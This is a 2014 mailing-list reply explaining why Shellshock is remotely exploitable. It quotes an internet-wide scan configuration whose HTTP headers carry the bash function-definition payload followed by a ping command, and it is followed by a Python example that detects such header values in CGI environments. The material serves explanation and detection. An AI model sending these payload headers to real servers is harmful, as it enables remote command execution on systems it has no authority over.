[Cialug] Shellshock Bash Remote Code Execution Vulnerability
Paul Gray
gray at cs.uni.edu
Thu Sep 25 12:57:27 CDT 2014
On 09/25/2014 12:23 PM, Scott Yates wrote:
> Help me understand a couple things:
>
> How is this operating remotely? I understand this being a problem if
> people have shell access to a box, but how is it that anything "remote" is
> allowed to set an environment variable in the first place?
>
> Am I missing something here, or is this only a problem if someone already
> has shell access?
The original post in this thread also had a description of the remote
exploitation with http headers (which he pulled from Robert's post):
target = 0.0.0.0/0
port = 80
banners = true
http-user-agent = shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)
http-header = Cookie:() { :; }; ping -c 3 209.126.230.74
http-header = Host:() { :; }; ping -c 3 209.126.230.74
http-header = Referer:() { :; }; ping -c 3 209.126.230.74
These headers caused the remote host to ping...that is, to execute the
command after the function definition.
-PG
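
To make the header-to-environment path in the reply above concrete, here is an added example (not part of the original message or of the quoted scan configuration): it maps request headers to CGI environment variables the way RFC 3875 describes and flags values that begin like a bash function definition. The function names, the sample request and the 192.0.2.1 address are constructed for illustration.

```python
import re

# Values starting with "() {" are what a vulnerable bash treats as an
# exported function. The pattern is deliberately looser on whitespace
# so that near-variants are flagged during log or request triage.
FUNC_PREFIX = re.compile(r"^\s*\(\)\s*\{")

def cgi_environment(headers):
    """Map request headers to CGI meta-variables (RFC 3875, section 4.1.18)."""
    env = {}
    for name, value in headers:
        key = name.upper().replace("-", "_")
        # Content-Type and Content-Length are passed without the HTTP_ prefix.
        if key not in ("CONTENT_TYPE", "CONTENT_LENGTH"):
            key = "HTTP_" + key
        env[key] = value
    return env

def suspicious_variables(env):
    """Return sorted names of variables whose value looks like a function definition."""
    return sorted(k for k, v in env.items() if FUNC_PREFIX.match(v))

def trailing_command(value):
    """Return the text after the function body's closing '};', or None."""
    if not FUNC_PREFIX.match(value):
        return None
    _, sep, rest = value.partition("};")
    return rest.strip() if sep else None

# Constructed sample request; 192.0.2.1 is a documentation address.
SAMPLE_REQUEST = [
    ("Host", "www.example.test"),
    ("User-Agent", "Mozilla/5.0 (X11; Linux x86_64)"),
    ("Cookie", "() { :; }; ping -c 3 192.0.2.1"),
    ("Referer", "() { :; }; ping -c 3 192.0.2.1"),
]

if __name__ == "__main__":
    env = cgi_environment(SAMPLE_REQUEST)
    for name in suspicious_variables(env):
        print(name, "->", trailing_command(env[name]))
```

No shell access is involved at any point: the web server itself places the client-supplied header text into the environment of whatever it spawns, which is why a CGI handler that invokes bash is reachable remotely.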